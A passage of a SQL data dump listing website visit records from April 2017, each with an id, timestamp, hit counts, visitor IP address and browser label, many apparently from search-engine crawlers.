64.132.161.3','other'),(104254,1493290909,1,0,1,0,'66.249.76.45',''),(104255,1493291526,1,1,0,0,'91.196.178.67','firefox'),(104256,1493292081,1,1,0,0,'151.80.27.118','other'),(104257,1493292293,1,1,0,0,'194.42.196.174','msie'),(104258,1493292395,1,0,1,0,'66.249.76.46',''),(104259,1493292636,1,0,1,0,'66.249.76.71',''),(104260,1493293473,1,0,1,0,'66.249.76.73',''),(104261,1493293833,1,1,0,0,'66.249.76.46','chrome'),(104262,1493294007,1,1,0,0,'217.69.133.217','other'),(104263,1493294153,2,2,0,0,'216.244.66.237','other'),(104264,1493294560,1,1,0,0,'188.32.24.133','msie'),(104265,1493294563,1,1,0,0,'193.107.72.66','chrome'),(104266,1493294590,1,1,0,0,'91.196.178.36','chrome'),(104267,1493295211,1,1,0,0,'178.92.197.188','firefox'),(104268,1493295326,1,1,0,0,'91.196.178.68','chrome'),(104269,1493295349,1,1,0,0,'217.182.132.77','other'),(104270,1493295722,1,1,0,0,'51.255.65.26','other'),(104271,1493295859,1,1,0,0,'91.196.178.71','other'),(104272,1493296033,1,1,0,0,'180.76.15.136','other'),(104273,1493296753,1,1,0,0,'51.255.65.32','other'),(104274,1493296836,1,1,0,0,'91.196.177.46','firefox'),(104275,1493297058,1,1,0,0,'164.132.161.83','other'),(104276,1493297300,1,1,0,0,'82.145.222.3','chrome'),(104277,1493297812,1,1,0,0,'195.49.151.89','chrome'),(104278,1493298055,1,1,0,0,'37.55.151.254','firefox'),(104279,1493298114,1,1,0,0,'91.196.178.71','firefox'),(104280,1493298259,2,2,0,0,'216.244.66.246','other'),(104281,1493298388,1,1,0,0,'91.196.178.66','chrome'),(104282,1493298451,1,1,0,0,'217.69.133.84','other'),(104283,1493298487,1,1,0,0,'137.74.201.108','other'),(104284,1493298502,1,1,0,0,'31.43.27.186','chrome'),(104285,1493298976,1,1,0,0,'37.55.151.254','firefox'),(104286,1493299048,3,3,0,0,'91.196.178.68','chrome'),(104287,1493299333,1,1,0,0,'51.255.65.23','other'),(104288,1493299495,1,1,0,0,'91.196.178.71','firefox'),(104289,1493299604,1,1,0,0,'178.212.111.37','other'),(104290,1493300315,1,1,0,0,'8.29.198.26','other'),(104291,1493300360,2,2,0,0,'216.244.66.246','other'),(104292,1493300603,1,1,0,0,'91.196.178.68','firefox'),(104293,1493300711,1,1,0,0,'91.196.178.68','opera'),(104294,1493300754,1,1,0,0,'91.196.178.68','chrome'),(104295,1493301147,1,1,0,0,'51.255.65.75','other'),(104296,1493301494,1,1,0,0,'217.182.132.68','other'),(104297,1493301604,1,1,0,0,'51.255.65.30','other'),(104298,1493301693,1,1,0,0,'51.255.65.96','other'),(104299,1493302011,1,1,0,0,'91.196.178.132','other'),(104300,1493302066,1,1,0,0,'37.55.151.254','firefox'),(104301,1493302193,1,0,1,0,'66.249.66.202',''),(104302,1493302504,1,1,0,0,'51.255.65.18','other'),(104303,1493302741,1,1,0,0,'216.244.66.237','other'),(104304,1493303087,1,1,0,0,'164.132.161.24','other'),(104305,1493303163,1,1,0,0,'217.69.133.246','other'),(104306,1493303239,1,1,0,0,'51.255.65.82','other'),(104307,1493303284,1,1,0,0,'137.74.207.188','other'),(104308,1493303462,1,1,0,0,'82.145.221.45','chrome'),(104309,1493303917,1,1,0,0,'95.132.53.203','firefox'),(104310,1493303953,1,1,0,0,'164.132.161.22','other'),(104311,1493304500,1,1,0,0,'164.132.161.96','other'),(104312,1493304532,1,1,0,0,'180.76.15.11','other'),(104313,1493304540,1,1,0,0,'164.132.161.39','other'),(104314,1493304975,1,1,0,0,'77.120.100.245','other'),(104315,1493305569,2,2,0,0,'216.244.66.246','other'),(104316,1493305925,1,1,0,0,'176.14.188.120','msie'),(104317,1493306546,1,1,0,0,'51.255.65.93','other'),(104318,1493306820,1,1,0,0,'164.132.161.11','other'),(104319,1493306975,1,1,0,0,'51.255.71.127','other'),(104320,1493306985,1,1,0,0,'164.132.161.18','other'),(104321,1493307051,1,0,1,0,'66.249.66.197',''),(104322,1493307366,1,1,0,0,'91.196.178.129','chrome'),(104323,1493308046,1,1,0,0,'137.74.207.116','other'),(104324,1493308136,1,1,0,0,'51.255.65.61','other'),(104325,1493308190,1,1,0,0,'51.255.65.40','other'),(104326,1493308383,1,1,0,0,'164.132.161.14','other'),(104327,1493309168,1,1,0,0,'51.255.71.128','other'),(104328,1493309274,1,1,0,0,'164.132.162.188','other'),(104329,1493309647,1,1,0,0,'91.209.214.11','chrome'),(104330,1493309932,1,1,0,0,'217.182.132.24','other'),(104331,1493310135,1,1,0,0,'217.182.132.68','other'),(104332,1493310171,1,1,0,0,'51.255.65.5','other'),(104333,1493310866,1,1,0,0,'217.182.132.178','other'),(104334,1493310905,1,1,0,0,'137.74.207.109','other'),(104335,1493311094,1,0,1,0,'66.249.76.27',''),(104336,1493311138,1,1,0,0,'8.29.198.27','other'),(104337,1493311223,3,3,0,0,'216.244.66.246','other'),(104338,1493311640,1,1,0,0,'51.255.65.29','other'),(104339,1493311659,1,1,0,0,'217.182.132.5','other'),(104340,1493312375,1,0,1,0,'66.249.66.87',''),(104341,1493312506,2,2,0,0,'216.244.66.246','other'),(104342,1493312675,1,1,0,0,'217.182.132.83','other'),(104343,1493312972,1,1,0,0,'51.255.65.83','other'),(104344,1493312977,1,1,0,0,'217.182.132.76','other'),(104345,1493313183,1,1,0,0,'157.55.39.127','other'),(104346,1493313251,1,1,0,0,'51.255.65.50','other'),(104347,1493313503,2,2,0,0,'216.244.66.237','other'),(104348,1493313977,1,1,0,0,'164.132.162.159','other'),(104349,1493314311,1,1,0,0,'51.255.65.68','other'),(104350,1493315025,1,0,1,0,'66.249.66.87',''),(104351,1493315061,1,1,0,0,'151.80.27.118','other'),(104352,1493315291,1,1,0,0,'185.26.180.216','other'),(104353,1493316410,1,1,0,0,'95.132.16.100','chrome'),(104354,1493316517,1,1,0,0,'217.182.132.192','other'),(104355,1493316584,1,1,0,0,'217.182.132.180','other'),(104356,1493317019,1,0,1,0,'66.249.66.210',''),(104357,1493317594,1,1,0,0,'217.69.133.216','other'),(104358,1493317623,1,1,0,0,'51.255.71.122','other'),(104359,1493317714,1,1,0,0,'82.145.220.88','other'),(104360,1493317839,1,1,0,0,'164.132.161.45','other'),(104361,1493317942,1,1,0,0,'217.69.133.219','other'),(104362,1493317976,3,3,0,0,'216.244.66.246','other'),(104363,1493317989,1,1,0,0,'51.255.65.66','other'),(104364,1493318246,1,1,0,0,'178.94.42.26','chrome'),(104365,1493318576,1,1,0,0,'164.132.161.79','other'),(104366,1493318667,1,1,0,0,'51.255.65.54','other'),(104367,1493318944,1,1,0,0,'46.219.254.90','chrome'),(104368,1493319060,2,2,0,0,'216.244.66.246','other'),(104369,1493319130,1,1,0,0,'164.132.161.47','other'),(104370,1493319327,1,1,0,0,'51.255.65.58','other'),(104371,1493319595,2,2,0,0,'162.210.196.97','other'),(104372,1493319672,1,1,0,0,'130.180.212.137','other'),(104373,1493320047,1,1,0,0,'51.255.65.38','other'),(104374,1493320178,1,1,0,0,'51.255.65.67','other'),(104375,1493320766,1,1,0,0,'185.80.220.38','chrome'),(104376,1493321335,1,1,0,0,'217.69.133.253','other'),(104377,1493321913,1,1,0,0,'164.132.161.22','other'),(104378,1493321925,1,1,0,0,'51.255.71.131','other'),(104379,1493321963,1,1,0,0,'8.29.198.26','other'),(104380,1493322064,1,1,0,0,'66.249.76.109','chrome'),(104381,1493323482,1,1,0,0,'217.69.133.247','other'),(104382,1493324150,1,1,0,0,'216.244.66.237','other'),(104383,1493324428,5,5,0,0,'216.244.66.246','other'),(104384,1493325037,1,1,0,0,'217.182.132.66','other'),(104385,1493325989,1,1,0,0,'217.182.132.75','other'),(104386,1493326243,1,1,0,0,'217.182.132.35','other'),(104387,1493327300,1,1,0,0,'51.255.65.73','other'),(104388,1493327574,1,0,1,0,'66.249.66.197',''),(104389,1493327949,1,1,0,0,'216.244.66.237','other'),(104390,1493328454,1,1,0,0,'157.55.39.134','other'),(104391,1493328861,1,1,0,0,'95.108.213.34','other'),(104392,1493328865,1,1,0,0,'178.154.200.37','other'),(104393,1493328869,1,1,0,0,'141.8.142.154','other'),(104394,1493329947,1,1,0,0,'164.132.161.41','other'),(104395,1493330780,1,1,0,0,'164.132.161.29','other'),(104396,1493331668,1,0,1,0,'66.249.76.28',''),(104397,1493332017,1,1,0,0,'51.255.65.51','other'),(104398,1493332797,1,1,0,0,'8.29.198.26','other'),(104399,1493333024,1,0,1,0,'66.249.76.27',''),(104400,1493334035,1,1,0,0,'164.132.161.72','other'),(104401,1493335232,1,1,0,0,'51.255.65.3','other'),(104402,1493335686,1,1,0,0,'164.132.161.65','other'),(104403,1493335980,1,1,0,0,'217.182.132.77','other'),(104404,1493336600,2,2,0,0,'216.244.66.246','other'),(104405,1493336937,1,1,0,0,'157.55.39.134','other'),(104406,1493337233,1,1,0,0,'157.55.39.195','other'),(104407,1493338664,1,1,0,0,'51.255.65.40','other'),(104408,1493338763,1,1,0,0,'217.182.132.7','other'),(104409,1493338899,1,1,0,0,'141.8.142.15','other'),(104410,1493339046,1,1,0,0,'51.255.65.34','other'),(104411,1493339494,1,1,0,0,'51.255.65.24','other'),(104412,1493341152,1,0,1,0,'66.249.66.28',''),(104413,1493341186,1,1,0,0,'51.255.65.44','other'),(104414,1493341459,1,1,0,0,'217.182.132.77','other'),(104415,1493341809,1,1,0,0,'217.182.132.60','other'),(104416,1493341966,1,1,0,0,'180.76.15.149','other'),(104417,1493342002,1,1,0,0,'217.182.132.27','other'),(104418,1493342650,1,1,0,0,'164.132.162.155','other'),(104419,1493343021,1,1,0,0,'51.255.71.128','other'),(104420,1493343171,1,1,0,0,'51.255.65.68','other'),(104421,1493343196,1,1,0,0,'51.255.65.60','other'),(104422,1493343435,1,1,0,0,'51.255.71.126','other'),(104423,1493343625,1,1,0,0,'8.29.198.25','other'),(104424,1493343818,1,1,0,0,'51.255.65.94','other'),(104425,1493344959,1,1,0,0,'51.255.65.49','other'),(104426,1493346095,1,1,0,0,'216.244.66.237','other'),(104427,1493346176,1,1,0,0,'217.182.132.58','other'),(104428,1493346241,1,1,0,0,'66.249.76.108','chrome'),(104429,1493346731,1,1,0,0,'164.132.161.79','other'),(104430,1493347135,1,1,0,0,'217.182.132.6','other'),(104431,1493348195,1,1,0,0,'157.55.39.195','other'),(104432,1493348642,1,0,1,0,'66.249.76.109',''),(104433,1493348699,1,1,0,0,'217.182.132.147','other'),(104434,1493348977,1,1,0,0,'51.255.71.118','other'),(104435,1493348979,1,1,0,0,'66.249.76.107','chrome'),(104436,1493348991,3,0,3,0,'66.249.76.28',''),(104437,1493349061,2,0,2,0,'66.249.76.29',''),(104438,1493349311,1,1,0,0,'216.244.66.246','other'),(104439,1493349700,1,1,0,0,'217.182.132.30','other'),(104440,1493349701,1,0,1,0,'66.249.76.108',''),(104441,1493349931,1,1,0,0,'164.132.161.11','other'),(104442,1493349999,1,1,0,0,'128.69.224.57','msie'),(104443,1493350230,1,1,0,0,'217.182.132.58','other'),(104444,1493350260,1,1,0,0,'66.249.66.84','chrome'),(104445,1493350660,1,0,1,0,'66.249.66.87',''),(104446,1493351089,1,1,0,0,'164.132.161.32','other'),(104447,1493351112,1,1,0,0,'217.182.132.184','other'),(104448,1493351174,1,1,0,0,'51.255.65.77','other'),(104449,1493351506,1,0,1,0,'66.249.66.81',''),(104450,1493351714,1,1,0,0,'51.255.65.60','other'),(104451,1493352528,1,1,0,0,'51.255.65.91','other'),(104452,1493352595,1,1,0,0,'217.182.132.174','other'),(104453,1493352634,1,1,0,0,'164.132.161.81','other'),(104454,1493352846,1,1,0,0,'176.31.231.10','other'),(104455,1493353482,1,1,0,0,'164.132.161.88','other'),(104456,1493353852,1,1,0,0,'51.255.65.52','other'),(104457,1493354063,1,1,0,0,'91.196.178.70','firefox'),(104458,1493354447,1,1,0,0,'8.29.198.26','other'),(104459,1493354605,1,1,0,0,'178.92.224.17','chrome'),(104460,1493355176,1,1,0,0,'91.196.178.70','firefox'),(104461,1493355643,1,1,0,0,'137.74.201.99','other'),(104462,1493356947,1,1,0,0,'93.158.152.79','other'),(104463,1493357062,1,1,0,0,'217.182.132.193','other'),(104464,1493357119,1,1,0,0,'66.249.76.108','chrome'),(104465,1493357197,2,2,0,0,'91.196.178.68','chrome'),(104466,1493357294,1,1,0,0,'91.196.177.46','firefox'),(104467,1493357328,1,1,0,0,'91.196.178.34','chrome'),(104468,1493357352,1,1,0,0,'217.182.132.173','other'),(104469,1493357366,1,1,0,0,'164.132.161.37','other'),(104470,1493358418,1,1,0,0,'164.132.161.69','other'),(104471,1493358731,1,1,0,0,'66.102.9.29','chrome'),(104472,1493358923,1,1,0,0,'137.74.207.164','other'),(104473,1493359583,12,12,0,0,'163.172.73.206','other'),(104474,1493360328,1,1,0,0,'91.196.178.65','chrome'),(104475,1493360363,1,1,0,0,'91.196.178.68','chrome'),(104476,1493360382,1,1,0,0,'95.108.213.7','other'),(104477,1493360418,1,1,0,0,'141.8.142.42','other'),(104478,1493360443,1,1,0,0,'141.8.132.25','other'),(104479,1493360788,1,1,0,0,'91.196.178.130','firefox'),(104480,1493360991,1,1,0,0,'37.52.17.98','firefox'),(104481,1493361288,1,1,0,0,'91.196.178.68','chrome'),(104482,1493361360,1,0,1,0,'66.249.76.109',''),(104483,1493361412,1,1,0,0,'95.135.90.86','chrome'),(104484,1493361869,1,1,0,0,'51.255.65.32','other'),(104485,1493361893,1,1,0,0,'51.255.65.30','other'),(104486,1493361945,1,1,0,0,'91.196.178.163','firefox'),(104487,1493362071,1,1,0,0,'207.46.13.21','other'),(104488,1493362317,1,1,0,0,'95.135.90.86','chrome'),(104489,1493362523,1,1,0,0,'51.255.65.19','other'),(104490,1493362793,1,1,0,0,'91.196.178.68','chrome'),(104491,1493363391,1,1,0,0,'46.133.135.249','firefox'),(104492,1493363529,1,1,0,0,'216.244.66.246','other'),(104493,1493364155,1,1,0,0,'51.255.65.51','other'),(104494,1493364327,1,1,0,0,'217.182.132.63','other'),(104495,1493364524,1,1,0,0,'217.182.132.85','other'),(104496,1493364881,1,1,0,0,'207.46.13.28','other'),(104497,1493364917,1,1,0,0,'37.52.17.98','firefox'),(104498,1493365270,1,1,0,0,'8.29.198.27','other'),(104499,1493365493,1,1,0,0,'91.196.178.67','firefox'),(104500,1493365496,1,1,0,0,'176.36.60.115','chrome'),(104501,1493365659,1,1,0,0,'51.255.65.57','other'),(104502,1493366310,1,1,0,0,'217.182.132.17','other'),(104503,1493366770,1,1,0,0,'51.255.65.63','other'),(104504,1493367156,1,1,0,0,'82.207.49.106','other'),(104505,1493367630,1,1,0,0,'51.255.65.54','other'),(104506,1493368456,2,2,0,0,'95.135.231.74','firefox'),(104507,1493368613,1,1,0,0,'164.132.161.9','other'),(104508,1493369042,1,1,0,0,'91.196.178.68','chrome'),(104509,1493369211,1,1,0,0,'91.196.178.163','chrome'),(104510,1493369231,1,1,0,0,'217.182.132.93','other'),(104511,1493369323,1,1,0,0,'217.182.132.92','other'),(104512,1493369513,1,1,0,0,'51.255.65.49','other'),(104513,1493369695,1,1,0,0,'216.244.66.237','other'),(104514,1493369986,1,0,1,0,'66.249.76.108',''),(104515,1493370607,1,1,0,0,'217.182.132.151','other'),(104516,1493371186,1,1,0,0,'217.182.132.22','other'),(104517,1493371337,1,1,0,0,'217.182.132.175','other'),(104518,1493371445,2,2,0,0,'95.108.213.34','other'),(104519,1493371457,2,2,0,0,'141.8.142.15','other'),(104520,1493372008,2,2,0,0,'108.59.8.70','other'),(104521,1493372076,1,1,0,0,'51.255.65.51','other'),(104522,1493372152,1,1,0,0,'66.249.76.28','chrome'),(104523,1493372202,1,1,0,0,'216.244.66.237','other'),(104524,1493372257,1,1,0,0,'164.132.162.157','other'),(104525,1493372301,1,1,0,0,'217.182.132.182','other'),(104526,1493372381,1,0,1,0,'66.249.76.29',''),(104527,1493372861,1,1,0,0,'217.182.132.83','other'),(104528,1493372886,1,1,0,0,'164.132.161.36','other'),(104529,1493373154,1,1,0,0,'51.255.65.35','other'),(104530,1493373574,1,1,0,0,'37.139.161.33','firefox'),(104531,1493373813,1,1,0,0,'95.135.231.74','firefox'),(104532,1493373829,1,1,0,0,'164.132.161.21','other'),(104533,1493373911,1,1,0,0,'178.94.58.128','chrome'),(104534,1493374004,1,1,0,0,'51.255.65.70','other'),(104535,1493374247,1,1,0,0,'164.132.161.4','other'),(104536,1493374282,1,1,0,0,'217.182.132.85','other'),(104537,1493374687,1,1,0,0,'51.255.65.91','other'),(104538,1493374796,1,1,0,0,'195.211.174.206','chrome'),(104539,1493374858,1,1,0,0,'164.132.161.87','other'),(104540,1493375327,1,1,0,0,'51.255.65.73','other'),(104541,1493375560,1,1,0,0,'164.132.162.188','other'),(104542,1493375697,1,1,0,0,'91.237.123.146','firefox'),(104543,1493375808,64,64,0,0,'64.140.169.42','firefox'),(104544,1493376099,1,1,0,0,'8.29.198.25','other'),(104545,1493376104,1,1,0,0,'164.132.161.64','other'),(104546,1493376156,1,1,0,0,'51.255.65.34','other'),(104547,1493376461,1,1,0,0,'66.249.76.29','chrome'),(104548,1493376611,1,1,0,0,'164.132.161.22','other'),(104549,1493376839,1,1,0,0,'95.132.111.120','chrome'),(104550,1493376933,1,1,0,0,'51.255.65.42','other'),(104551,1493377195,1,1,0,0,'91.196.177.26','chrome'),(104552,1493377537,1,1,0,0,'91.196.178.66','firefox'),(104553,1493377576,1,1,0,0,'164.132.161.64','other'),(104554,1493377680,1,1,0,0,'51.255.65.39','other'),(104555,1493377717,1,0,1,0,'66.249.76.27',''),(104556,1493377820,1,1,0,0,'188.255.17.125','chrome'),(104557,1493378725,1,0,1,0,'66.249.76.109',''),(104558,1493378801,1,1,0,0,'82.207.91.234','firefox'),(104559,1493378916,1,1,0,0,'157.55.39.195','other'),(104560,1493379530,1,1,0,0,'91.196.178.68','msie'),(104561,1493379844,1,1,0,0,'51.255.65.3','other'),(104562,1493380050,1,0,1,0,'66.249.66.25',''),(104563,1493380136,1,1,0,0,'178.92.155.104','chrome'),(104564,1493380198,1,1,0,0,'194.187.216.46','chrome'),(104565,1493380411,1,1,0,0,'51.255.65.65','other'),(104566,1493380470,1,1,0,0,'164.132.161.89','other'),(104567,1493380756,2,2,0,0,'31.43.54.36','chrome'),(104568,1493380797,1,1,0,0,'66.249.76.28','chrome'),(104569,1493381218,1,0,1,0,'66.249.76.108',''),(104570,1493382313,1,1,0,0,'51.255.71.130','other'),(104571,1493382879,1,1,0,0,'51.255.65.97','other'),(104572,1493382930,1,1,0,0,'217.182.132.78','other'),(104573,1493382957,1,1,0,0,'5.255.253.63','other'),(104574,1493382959,1,1,0,0,'95.108.213.7','other'),(104575,1493382970,1,1,0,0,'66.249.76.107','chrome'),(104576,1493382995,1,1,0,0,'180.76.15.160','other'),(104577,1493383670,1,1,0,0,'217.182.132.59','other'),(104578,1493384937,1,1,0,0,'137.74.207.114','other'),(104579,1493385165,1,1,0,0,'217.182.132.182','other'),(104580,1493385183,1,0,1,0,'66.249.76.28',''),(104581,1493386722,1,1,0,0,'91.196.177.26','chrome'),(104582,1493386924,1,1,0,0,'8.29.198.26','other'),(104583,1493386994,1,1,0,0,'164.132.162.156','other'),(104584,1493387260,1,1,0,0,'151.80.27.118','other'),(104585,1493387331,1,1,0,0,'217.182.132.64','other'),(104586,1493387591,1,1,0,0,'164.132.161.89','other'),(104587,1493387654,1,1,0,0,'91.196.178.163','chrome'),(104588,1493388189,1,1,0,0,'91.196.177.15','chrome'),(104589,1493388746,1,1,0,0,'164.132.162.154','other'),(104590,1493388954,1,1,0,0,'217.182.132.179','other'),(104591,1493389338,1,1,0,0,'164.132.161.42','other'),(104592,1493389667,1,1,0,0,'51.255.65.6','other'),(104593,1493389966,1,1,0,0,'217.182.132.37','other'),(104594,1493390250,1,1,0,0,'217.182.132.18','other'),(104595,1493390629,1,1,0,0,'217.182.132.75','other'),(104596,1493390884,1,1,0,0,'46.201.241.60','chrome'),(104597,1493390897,1,1,0,0,'217.182.132.51','other'),(104598,1493391618,1,1,0,0,'51.255.65.34','other'),(104599,1493391711,1,1,0,0,'51.255.65.19','other'),(104600,1493391717,1,0,1,0,'66.249.76.28',''),(104601,1493391879,1,1,0,0,'216.244.66.237','other'),(104602,1493392585,1,1,0,0,'164.132.161.72','other'),(104603,1493393441,1,1,0,0,'37.115.88.180','chrome'),(104604,1493393945,1,1,0,0,'178.92.74.105','chrome'),(104605,1493393950,1,1,0,0,'217.182.132.33','other'),(104606,1493394045,1,1,0,0,'51.255.71.131','other'),(104607,1493394519,1,1,0,0,'137.74.207.109','other'),(104608,1493394841,1,1,0,0,'217.182.132.61','other'),(104609,1493395832,1,1,0,0,'164.132.161.23','other'),(104610,1493396696,1,1,0,0,'51.255.65.29','other'),(104611,1493396743,1,1,0,0,'164.132.161.22','other'),(104612,1493396911,1,1,0,0,'217.182.132.73','other'),(104613,1493397587,1,1,0,0,'51.255.65.6','other'),(104614,1493397750,1,1,0,0,'8.29.198.26','other'),(104615,1493398926,1,1,0,0,'164.132.161.2','other'),(104616,1493398927,1,1,0,0,'37.54.21.18','chrome'),(104617,1493399234,1,1,0,0,'51.255.65.60','other'),(104618,1493399408,1,1,0,0,'217.182.132.20','other'),(104619,1493399987,1,1,0,0,'51.255.71.133','other'),(104620,1493400268,1,1,0,0,'66.102.9.27','chrome'),(104621,1493400651,2,2,0,0,'216.244.66.246','other'),(104622,1493400985,2,2,0,0,'88.153.8.11','other'),(104623,1493401013,1,1,0,0,'46.63.3.20','chrome'),(104624,1493401065,1,1,0,0,'164.132.161.56','other'),(104625,1493401520,56,56,0,0,'178.62.107.16','other'),(104626,1493402094,2,2,0,0,'216.244.66.246','other'),(104627,1493402253,1,1,0,0,'164.132.161.85','other'),(104628,1493403457,1,0,1,0,'66.249.76.107',''),(104629,1493404767,1,0,1,0,'66.249.76.28',''),(104630,1493404882,1,0,1,0,'66.249.66.25',''),(104631,1493405345,2,0,2,0,'66.249.76.107',''),(104632,1493405761,1,1,0,0,'216.244.66.246','other'),(104633,1493407038,2,2,0,0,'91.196.178.39','chrome'),(104634,1493407240,1,1,0,0,'66.249.76.107','chrome'),(104635,1493407645,1,1,0,0,'66.249.76.109','chrome'),(104636,1493408577,1,1,0,0,'8.29.198.26','other'),(104637,1493411020,4,4,0,0,'216.244.66.246','other'),(104638,1493411074,1,1,0,0,'141.0.12.33','other'),(104639,1493411351,1,0,1,0,'66.249.76.29',''),(104640,1493411588,1,1,0,0,'91.196.178.166','chrome'),(104641,1493412579,1,0,1,0,'66.249.66.81',''),(104642,1493413057,1,1,0,0,'216.244.66.195','other'),(104643,1493413074,1,1,0,0,'31.13.113.78','other'),(104644,1493413075,1,1,0,0,'173.252.84.202','other'),(104646,1493413093,1,1,0,0,'46.211.117.55','chrome'),(104647,1493413947,7,7,0,0,'118.193.203.205','other'),(104650,1493414002,1,0,1,0,'66.249.66.87',''),(104651,1493415025,1,1,0,0,'66.249.66.171','chrome'),(104652,1493415311,1,1,0,0,'216.244.66.237','other'),(104653,1493417773,1,0,1,0,'66.249.66.183',''),(104654,1493417992,1,1,0,0,'217.182.132.67','other'),(104655,1493418315,1,1,0,0,'51.255.65.22','other'),(104656,1493419056,1,1,0,0,'51.255.65.43','other'),(104657,1493419119,1,1,0,0,'51.255.65.80','other'),(104658,1493419176,1,1,0,0,'66.249.76.107','chrome'),(104659,1493419408,1,1,0,0,'8.29.198.27','other'),(104660,1493419481,1,1,0,0,'151.80.27.118','other'),(104661,1493419987,1,1,0,0,'216.244.66.237','other'),(104662,1493420087,1,1,0,0,'51.255.65.22','other'),(104663,1493420271,1,1,0,0,'137.74.207.110','other'),(104664,1493420937,1,1,0,0,'164.132.161.27','other'),(104665,1493421577,1,1,0,0,'66.249.66.183','chrome'),(104666,1493421702,1,1,0,0,'66.249.76.109','chrome'),(104667,1493421752,1,1,0,0,'137.74.207.188','other'),(104668,1493422492,1,1,0,0,'217.182.132.187','other'),(104669,1493422726,1,1,0,0,'164.132.161.2','other'),(104670,1493422733,1,1,0,0,'51.255.65.93','other'),(104671,1493422914,1,1,0,0,'207.46.13.23','other'),(104672,1493423461,1,1,0,0,'217.69.133.5','other'),(104673,1493423858,2,2,0,0,'216.244.66.246','other'),(104674,1493424308,1,1,0,0,'51.255.65.47','other'),(104675,1493424343,1,1,0,0,'164.132.161.10','other'),(104676,1493424663,1,1,0,0,'164.132.162.159','other'),(104677,1493424673,1,1,0,0,'180.76.15.33','other'),(104678,1493424797,1,1,0,0,'51.255.71.126','other'),(104679,1493424868,1,1,0,0,'164.132.161.32','other'),(104680,1493424927,1,1,0,0,'164.132.161.35','other'),(104681,1493425069,1,1,0,0,'178.255.215.94','other'),(104682,1493425252,1,1,0,0,'164.132.161.28','other'),(104683,1493425343,1,1,0,0,'164.132.161.17','other'),(104684,1493425588,1,1,0,0,'176.195.99.209','msie'),(104685,1493425672,1,1,0,0,'51.255.71.101','other'),(104686,1493426223,1,1,0,0,'217.182.132.22','other'),(104687,1493426267,1,1,0,0,'164.132.161.92','other'),(104688,1493426418,1,1,0,0,'164.132.161.51','other'),(104689,1493426552,1,0,1,0,'66.249.76.109',''),(104690,1493427560,1,1,0,0,'164.132.162.164','other'),(104691,1493427787,1,1,0,0,'217.182.132.188','other'),(104692,1493427944,1,1,0,0,'51.255.65.24','other'),(104693,1493428395,1,1,0,0,'164.132.161.64','other'),(104694,1493428894,1,1,0,0,'66.249.76.109','chrome'),(104695,1493429033,1,1,0,0,'164.132.161.85','other'),(104696,1493429246,1,1,0,0,'217.182.132.61','other'),(104697,1493429639,1,1,0,0,'217.182.132.82','other'),(104698,1493429777,1,1,0,0,'164.132.161.74','other'),(104699,1493430230,1,1,0,0,'8.29.198.27','other'),(104700,1493430378,1,1,0,0,'164.132.161.80','other'),(104701,1493430639,1,0,1,0,'66.249.76.29',''),(104702,1493430987,1,1,0,0,'51.255.65.11','other'),(104703,1493432058,1,1,0,0,'51.255.65.43','other'),(104704,1493432074,1,1,0,0,'51.255.65.7','other'),(104705,1493432297,1,1,0,0,'217.182.132.4','other'),(104706,1493432917,1,1,0,0,'51.255.71.128','other'),(104707,1493433058,1,1,0,0,'216.244.66.237','other'),(104708,1493433287,1,1,0,0,'217.182.132.179','other'),(104709,1493433448,1,1,0,0,'217.182.132.64','other'),(104710,1493434027,1,0,1,0,'66.249.76.29',''),(104711,1493434086,1,1,0,0,'51.255.65.97','other'),(104712,1493434122,1,1,0,0,'217.182.132.74','other'),(104713,1493434165,1,1,0,0,'217.182.132.173','other'),(104714,1493434694,1,1,0,0,'164.132.161.33','other'),(104715,1493434708,1,1,0,0,'217.182.132.182','other'),(104716,1493434714,1,1,0,0,'217.69.133.67','other'),(104717,1493434749,1,1,0,0,'217.69.133.59','other'),(104718,1493435287,1,1,0,0,'51.255.65.37','other'),(104719,1493435633,1,0,1,0,'66.249.76.108',''),(104720,1493436809,1,1,0,0,'51.255.65.79','other'),(104721,1493437039,1,1,0,0,'51.255.65.87','other'),(104722,1493437417,1,1,0,0,'217.182.132.60','other'),(104723,1493437508,1,1,0,0,'51.255.65.88','other'),(104724,1493437598,11,11,0,0,'192.187.104.235','other'),(104725,1493437892,1,1,0,0,'207.46.13.23','other'),(104726,1493437966,3,3,0,0,'95.108.213.34','other'),(104727,1493438713,1,1,0,0,'137.74.207.119','other'),(104728,1493439863,1,1,0,0,'51.255.65.29','other'),(104729,1493440709,1,1,0,0,'217.182.132.79','other'),(104730,1493440767,1,1,0,0,'164.132.162.187','other'),(104731,1493440772,1,1,0,0,'217.182.132.7','other'),(104732,1493440895,1,1,0,0,'212.119.161.250','firefox'),(104733,1493441062,1,1,0,0,'8.29.198.26','other'),(104734,1493441126,1,1,0,0,'51.255.65.2','other'),(104735,1493442168,1,1,0,0,'128.69.163.58','msie'),(104736,1493442910,1,1,0,0,'51.255.65.23','other'),(104737,1493443095,1,1,0,0,'217.182.132.21','other'),(104738,1493443403,1,1,0,0,'51.255.65.26','other'),(104739,1493443623,1,1,0,0,'164.132.161.40','other'),(104740,1493444289,2,2,0,0,'157.55.39.190','other'),(104741,1493444494,1,1,0,0,'51.255.71.120','other'),(104742,1493444732,1,1,0,0,'217.182.132.90','other'),(104743,1493444867,1,1,0,0,'217.69.133.3','other'),(104744,1493445245,1,1,0,0,'164.132.161.39','other'),(104745,1493445335,1,1,0,0,'164.132.161.87','other'),(104746,1493445406,1,1,0,0,'164.132.161.32','other'),(104747,1493445600,1,1,0,0,'164.132.161.61','other'),(104748,1493445621,1,1,0,0,'51.255.65.48','other'),(104749,1493445680,1,1,0,0,'51.255.65.57','other'),(104750,1493445830,1,1,0,0,'51.255.65.27','other'),(104751,1493445939,1,1,0,0,'51.255.65.59','other'),(104752,1493446038,1,1,0,0,'51.255.65.32','other'),(104753,1493446083,1,1,0,0,'51.255.65.9','other'),(104754,1493446166,1,0,1,0,'66.249.76.107',''),(104755,1493446236,1,1,0,0,'164.132.161.13','other'),(104756,1493446643,1,1,0,0,'51.255.65.91','other'),(104757,1493446979,1,1,0,0,'94.178.7.56','chrome'),(104758,1493447044,1,1,0,0,'66.249.76.28','chrome'),(104759,1493447048,1,1,0,0,'66.249.93.155','chrome'),(104760,1493447260,1,1,0,0,'217.182.132.187','other'),(104761,1493447264,1,1,0,0,'217.182.132.177','other'),(104762,1493447860,1,1,0,0,'51.255.71.126','other'),(104763,1493448009,1,1,0,0,'207.46.13.23','other'),(104764,1493448302,1,1,0,0,'217.182.132.24','other'),(104765,1493448426,1,1,0,0,'51.255.71.132','other'),(104766,1493448549,1,1,0,0,'217.182.132.65','other'),(104767,1493448683,1,1,0,0,'217.182.132.68','other'),(104768,1493448840,1,1